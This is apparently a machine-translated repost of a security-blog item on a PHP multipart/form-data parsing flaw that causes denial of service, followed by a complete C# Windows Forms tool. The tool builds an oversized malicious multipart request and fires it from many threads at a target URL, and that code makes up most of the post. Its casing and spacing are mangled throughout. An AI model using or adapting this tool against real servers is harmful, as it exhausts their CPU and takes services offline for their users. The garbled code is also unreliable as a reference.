PHP multipart/form-data DOS C # test Tool

Source: Internet
Author: User

According to the Cloud network, Baidu Defense Security Laboratory provides the latest loopholes, exist in PHP versions:

PHP parsingmultipart/form-data httpa duplicate copy string causes a DOS when the requested body part requests the header. A remote attacker sends a maliciously constructedmultipart/form-datarequests, causing the server CPU resources to be exhausted, thereby remote DOS servers.

Original link: http://drops.wooyun.org/papers/6077

Roughly because PHP parses the request, it reads the data on a row, then once per row of memory allocations and memory copies, which consumes n^2 time, the original use of Python, now provides C # code:


For the results of local tests, the Apache CPU consumes 100%:


Code:

Using system;using system.collections.generic;using system.collections.specialized;using System.ComponentModel; Using system.data;using system.drawing;using system.io;using system.linq;using system.net;using System.Text;using    System.threading.tasks;using system.windows.forms;using System.threading;namespace WindowsFormsApplication1{        Public partial class Form1:form {public Form1 () {InitializeComponent (); private void Button1_Click (object sender, EventArgs e) {string s = Httppostdata ().            ToString ();            s = "Response time:" + S;        MessageBox.Show (s);            } private Double Httppostdata () {string url=this.textbox1.text; int timeOut = 10000, lcount = Int.            Parse (TextBox2.Text);            String responsecontent;            String filekeyname = "File";                        String FilePath = "58.jpg";            var memstream = new MemoryStream (); var webRequest = (HTTPWebrequest) webrequest.create (URL);            The boundary character var boundary = "---------------" + DateTime.Now.Ticks.ToString ("x");                       Boundary character var beginboundary = Encoding.ASCII.GetBytes ("--" + boundary + "\ r \ n");            The last terminator var endboundary = Encoding.ASCII.GetBytes ("--" + Boundary + "--\r\n");            Set Property Webrequest.method = "POST";            Webrequest.timeout = Timeout; Webrequest.contenttype = "Multipart/form-data;            boundary= "+ boundary; Write file const string filepartheader = "Content-disposition:form-data; Name=\ "{0}\";            Filename=\ "S"; var header = string.            Format (Filepartheader, filekeyname);            var headerbytes = Encoding.UTF8.GetBytes (header);            Memstream.write (beginboundary, 0, beginboundary.length); Memstream.write (headerbytes, 0, Headerbytes.            Length);            var buffer = new Byte[2]; Buffer = Encoding.UTF8.GetByTES ("a\n"); int bytesread=2;            =0 for (int i = 0; i < lcount;i++) memstream.write (buffer, 0, bytesread);            var bb = "\" \ncontent-type:application/octet-stream\r\n\r\ndatadata\r\n ";            BB + = boundary;            BB + = "--";            var BODY = new byte[1024];                        Body=encoding.utf8.getbytes (BB);            Memstream.write (body, 0, Encoding.UTF8.GetByteCount (BB));            Writes the last end of the bounding character Memstream.write (endboundary, 0, endboundary.length);            Webrequest.contentlength = Memstream.length;            var requeststream = Webrequest.getrequeststream ();            memstream.position = 0;            var tempbuffer = new Byte[memstream.length];            Memstream.read (tempbuffer, 0, tempbuffer.length);            Memstream.close ();            requestStream.Write (tempbuffer, 0, tempbuffer.length);            Requeststream.close ();            DateTime d = DateTime.Now; var HttpwebrespoNSE = (HttpWebResponse) webrequest.getresponse ();                                                            Using var httpstreamreader = new StreamReader (Httpwebresponse.getresponsestream (), Encoding.GetEncoding ("Utf-8"))) {responsecontent = Httpstreamreader.readto            End ();            } httpwebresponse.close ();                        Webrequest.abort (); Return (datetime.now-d).        TotalSeconds;            } private void Attack () {string url = this.textBox1.Text; int timeOut = 10000, lcount = Int.            Parse (TextBox2.Text);            String responsecontent;            String filekeyname = "File";            String FilePath = "58.jpg";            var memstream = new MemoryStream ();            var webRequest = (HttpWebRequest) webrequest.create (URL);            The boundary character var boundary = "---------------" + DateTime.Now.Ticks.ToString ("x"); Boundary character var beginboundary = EncOding. Ascii.            GetBytes ("--" + boundary + "\ r \ n");            The last terminator var endboundary = Encoding.ASCII.GetBytes ("--" + Boundary + "--\r\n");            Set Property Webrequest.method = "POST";            Webrequest.timeout = Timeout; Webrequest.contenttype = "Multipart/form-data;            boundary= "+ boundary; Write file const string filepartheader = "Content-disposition:form-data; Name=\ "{0}\";            Filename=\ "S"; var header = string.            Format (Filepartheader, filekeyname);            var headerbytes = Encoding.UTF8.GetBytes (header);            Memstream.write (beginboundary, 0, beginboundary.length); Memstream.write (headerbytes, 0, Headerbytes.            Length);            var buffer = new Byte[2];            Buffer = Encoding.UTF8.GetBytes ("a\n"); int bytesread = 2;            =0 for (int i = 0; i < lcount; i++) memstream.write (buffer, 0, bytesread); var bb = "\" \ncontent-type:applicaTion/octet-stream\r\n\r\ndatadata\r\n ";            BB + = boundary;            BB + = "--";            var BODY = new byte[1024];            BODY = Encoding.UTF8.GetBytes (BB);            Memstream.write (body, 0, Encoding.UTF8.GetByteCount (BB));            Writes the last end of the bounding character Memstream.write (endboundary, 0, endboundary.length);            Webrequest.contentlength = Memstream.length;            var requeststream = Webrequest.getrequeststream ();            memstream.position = 0;            var tempbuffer = new Byte[memstream.length];            Memstream.read (tempbuffer, 0, tempbuffer.length);            Memstream.close ();            requestStream.Write (tempbuffer, 0, tempbuffer.length);            Requeststream.close ();            DateTime d = DateTime.Now;            var HttpWebResponse = (HttpWebResponse) webrequest.getresponse ();                                                            Using var httpstreamreader = new StreamReader (Httpwebresponse.getresponsestream (),Encoding.GetEncoding ("Utf-8")) {responsecontent = Httpstreamreader.readtoend ();            } httpwebresponse.close ();        Webrequest.abort (); The private void button2_click (object sender, EventArgs e) {int n = Int.             Parse (TextBox3.Text); for (int i=0;i<n;i++) {new Thread (Attack).            Start (); }        }    }}


PHP multipart/form-data DOS C # test Tool

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.